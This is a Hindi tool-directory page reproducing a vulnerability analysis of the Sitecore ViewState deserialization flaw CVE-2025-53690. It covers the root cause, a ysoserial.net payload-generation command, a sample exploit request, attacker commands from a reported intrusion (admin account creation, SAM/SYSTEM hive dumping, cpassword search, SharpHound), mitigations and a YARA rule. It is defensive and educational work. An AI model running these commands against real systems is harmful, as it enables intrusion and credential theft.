Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-53690-Analysis — यह CVE-2025-53690 विश्लेषण दस्तावेज़ हैं। | Kitploit
उपकरण/GitHubGitHub/m0d0ri205/cve-2025-53690-analysis
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफोरेंसिकमालवेयर विश्लेषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगघटना प्रतिक्रिया
GitHubm0d0ri205/cve-2025-53690-analysis

CVE-2025-53690-Analysis

यह CVE-2025-53690 विश्लेषण दस्तावेज़ हैं।

341 साल पहलेअभी तक समीक्षित नहीं
रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-53690: Sitecore ViewState डिसीरियलाइज़ेशन भेद्यता विश्लेषण

अवलोकन

CVE-2025-53690, Sitecore उत्पाद परिवार में पाई गई एक ViewState डिसीरियलाइज़ेशन भेद्यता है, जो उजागर ASP.NET machine key का दुरुपयोग करके रिमोट कोड निष्पादन संभव बनाने वाली एक गंभीर सुरक्षा भेद्यता है।

मूल जानकारी

  • CVE ID: CVE-2025-53690
  • CVSS स्कोर: 9.0 (Critical)
  • भेद्यता प्रकार: Deserialization of Untrusted Data (CWE-502)
  • खोज तिथि: सितंबर 2025
  • प्रकाशन तिथि: 3 सितंबर 2025
  • वास्तविक शोषण: दिसंबर 2024 से Zero-day के रूप में शोषित

प्रभावित उत्पाद

  • Sitecore Experience Manager (XM) - 9.0 और उससे नीचे के सभी संस्करण
  • Sitecore Experience Platform (XP) - 9.0 और उससे नीचे के सभी संस्करण
  • Sitecore Experience Commerce (XC)
  • Sitecore Managed Cloud
  • Active Directory मॉड्यूल 1.4 और उससे नीचे

भेद्यता का विस्तृत विश्लेषण

मूल कारण

इस भेद्यता का मूल गलत कॉन्फ़िगरेशन प्रबंधन में निहित है:

  1. नमूना Machine Key का उपयोग: 2017 से पहले के Sitecore परिनियोजन गाइडों में शामिल नमूना ASP.NET machine key प्रोडक्शन वातावरण में वैसे ही उपयोग किया गया
  2. स्थिर कुंजी का पुन: उपयोग: कई परिनियोजनों में समान machine key बार-बार उपयोग किया गया
  3. ViewState सत्यापन बाईपास: उजागर कुंजी के माध्यम से ViewState अखंडता सत्यापन को बायपास किया जा सकता है

ASP.NET ViewState तंत्र

ViewState ASP.NET की एक स्थिति प्रबंधन सुविधा है:

  • वेबपेज की स्थिति को __VIEWSTATE छिपे हुए फ़ील्ड में संग्रहीत करता है
  • Machine key का उपयोग करके अखंडता और गोपनीयता सुनिश्चित करता है
  • सर्वर ViewState को डिसीरियलाइज़ करके पेज की स्थिति पुनर्स्थापित करता है
root@kitploit:~
<!-- web.config 예시 -->
<system.web>
    <machineKey 
        validationKey="[64바이트 키]"
        decryptionKey="[48바이트 키]"
        validation="HMACSHA256" 
        decryption="AES" />
</system.web>

हमले के वेक्टर

1. कमजोर एंडपॉइंट की पहचान

root@kitploit:~
Target: /sitecore/blocked.aspx
Method: POST
특징: 인증 없이 접근 가능, ViewState 사용

2. दुर्भावनापूर्ण ViewState पेलोड निर्माण

हमलावर ज्ञात machine key और ysoserial.net का उपयोग करके दुर्भावनापूर्ण पेलोड बनाता है:

root@kitploit:~
# ysoserial.net 사용 예시
ysoserial.exe -f ViewState -g TypeConfuseDelegate -c "calc.exe" --validationkey="[키]" --validationalg="HMACSHA256" --decryptionkey="[키]" --decryptionalg="AES"

3. HTTP अनुरोध भेजना

root@kitploit:~
POST /sitecore/blocked.aspx HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

__VIEWSTATE=[악성_페이로드]&__VIEWSTATEGENERATOR=[값]

वास्तविक हमले के मामले का विश्लेषण (Mandiant रिपोर्ट)

हमले का जीवनचक्र

चरण 1: प्रारंभिक घुसपैठ

  • एंडपॉइंट: /sitecore/blocked.aspx
  • तरीका: ViewState डिसीरियलाइज़ेशन हमला
  • विशेषाधिकार: NETWORK SERVICE (IIS worker process)
  • पेलोड: WEEPSTEEL टोही उपकरण

चरण 2: टोही और पैर जमाना

root@kitploit:~
# 실행된 명령들
whoami
hostname  
net user
tasklist
ipconfig /all
netstat -ano
net group "domain admins"

परिनियोजित उपकरण:

  • 7za.exe: फ़ाइल संपीड़न उपकरण
  • lfe.ico: EARTHWORM नेटवर्क टनलिंग उपकरण
  • 1.vbs: कमांड निष्पादन के लिए VBScript

चरण 3: विशेषाधिकार वृद्धि

root@kitploit:~
# 로컬 관리자 계정 생성
net user asp$ [패스워드] /add
net localgroup administrators asp$ /add

net user sawadmin [패스워드] /add  
net localgroup administrators sawadmin /add

क्रेडेंशियल संग्रहण:

root@kitploit:~
reg save HKLM\SYSTEM c:\users\public\system.hive
reg save HKLM\SAM c:\users\public\sam.hive

चरण 4: निरंतरता स्थापित करना

  • RDP पहुंच: निर्मित व्यवस्थापक खाते का उपयोग करना
  • DWAGENT: रिमोट एक्सेस उपकरण की स्थापना (SYSTEM विशेषाधिकार के साथ सेवा के रूप में पंजीकरण)
  • खाता सेटिंग्स परिवर्तन:
root@kitploit:~
net user [AdminUser] /passwordchg:no /expires:never
wmic useraccount where name='[AdminUser]' set PasswordExpires=False

चरण 5: आंतरिक टोही

root@kitploit:~
# Domain Controller 식별
nltest /DCLIST:[domain]
nslookup [domain-controller]

# GPO에서 cpassword 검색 (Group Policy Preferences 공격)
findstr /S /l cpassword \\[DC]\sysvol\[domain]\policies\*.xml

# BloodHound/SharpHound 실행
sh.exe -c all

चरण 6: पार्श्व गति

  • चुराए गए डोमेन व्यवस्थापक खाते से अन्य प्रणालियों पर RDP पहुंच
  • EARTHWORM के माध्यम से नेटवर्क टनलिंग द्वारा सुरक्षा को बायपास करना

उपयोग किए गए उपकरणों का विश्लेषण

WEEPSTEEL (टोही उपकरण)

root@kitploit:~
// 수집하는 정보
Information.BasicsInfo basicsInfo = new Information.BasicsInfo
{
    Directories = new Information.Directories
    {
        CurrentWebDirectory = HostingEnvironment.MapPath("~/")
    },
    OperatingSystemInformation = Information.GetOperatingSystemInformation(),
    DiskInformation = Information.GetDiskInformation(),
    NetworkAdapterInformation = Information.GetNetworkAdapterInformation(),
    Process = Information.GetProcessInformation()
};

आउटपुट विधि: ViewState के रूप में प्रच्छन्न करके डेटा छिपाना

root@kitploit:~
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 
       value="/wEPDwUKLTcyODc4{AES 암호화 + base64 인코딩된 출력}" />

EARTHWORM (नेटवर्क टनलिंग)

  • SOCKS v5 प्रॉक्सी सर्वर कार्यक्षमता
  • फ़ायरवॉल बाईपास और ट्रैफ़िक छिपाना
  • RDP ट्रैफ़िक को टनल करके पहचान से बचना

DWAGENT (रिमोट एक्सेस)

  • वैध रिमोट प्रबंधन उपकरण
  • SYSTEM विशेषाधिकार के साथ सेवा के रूप में पंजीकरण
  • स्वचालित प्रारंभ द्वारा निरंतरता स्थापित करना

SHARPHOUND (AD टोही)

  • BloodHound के लिए डेटा संग्रह उपकरण
  • Active Directory वातावरण मैपिंग
  • हमले के मार्गों की पहचान

रक्षा और शमन उपाय

तत्काल कार्रवाई

root@kitploit:~
<!-- 고유한 machine key 생성 -->
<machineKey 
    validationKey="[새로운_64바이트_키]"
    decryptionKey="[새로운_48바이트_키]"
    validation="HMACSHA256" 
    decryption="AES" />

सुरक्षा सुदृढ़ीकरण उपाय

  1. स्वचालित कुंजी रोटेशन
  2. ViewState MAC सत्यापन सक्षम करना
  3. कॉन्फ़िगरेशन फ़ाइल एन्क्रिप्शन
  4. नेटवर्क विभाजन
  5. निगरानी सुदृढ़ीकरण

पहचान नियम

root@kitploit:~
# YARA 규칙 예시 (WEEPSTEEL 탐지)
rule WEEPSTEEL_Detection {
    strings:
        $viewstate = "__VIEWSTATE"
        $crypto = "System.Security.Cryptography"
        $serializer = "JavaScriptSerializer"
    condition:
        all of them
}

निष्कर्ष

CVE-2025-53690 इस बात का एक प्रतिनिधि उदाहरण है कि कैसे एक साधारण कॉन्फ़िगरेशन गलती एक गंभीर सुरक्षा खतरे में बदल सकती है। इस भेद्यता के माध्यम से, सीखने वाले वास्तविक APT हमले के पूरे जीवनचक्र का अनुभव कर सकते हैं और आधुनिक हमले की तकनीकों तथा रक्षा रणनीतियों को समझ सकते हैं।

संदर्भ सामग्री

  • Google Cloud Blog - ViewState Deserialization Zero-Day
  • Sitecore Advisory SC2025-005
  • CISA KEV Catalog
  • ysoserial.net
  • Microsoft Security Blog - ASP.NET Machine Keys
टूल डाउनलोड करें